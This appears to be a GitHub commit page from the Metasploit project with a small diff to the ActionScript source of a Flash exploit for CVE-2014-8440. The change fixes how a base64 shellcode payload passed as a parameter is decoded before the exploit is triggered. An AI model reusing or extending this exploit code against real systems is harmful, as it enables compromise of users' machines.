We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent da36291 commit 5c8c5aeCopy full SHA for 5c8c5ae
data/exploits/CVE-2014-8440/msf.swf
7 Bytes
external/source/exploits/CVE-2014-8440/Msf.as
@@ -42,8 +42,11 @@ package
42
this.object_vector_length = 5770 * 2
43
this.byte_array_vector_length = 510 * 2
44
45
- b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
46
- payload = b64.toByteArray().toString();
+ var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+ var pattern:RegExp = / /g;
47
+ b64_payload = b64_payload.replace(pattern, "+")
48
+ b64.decode(b64_payload)
49
+ payload = b64.toByteArray().toString()
50
51
this.initialize_worker_and_ba()
52
if (!this.trigger())
0 commit comments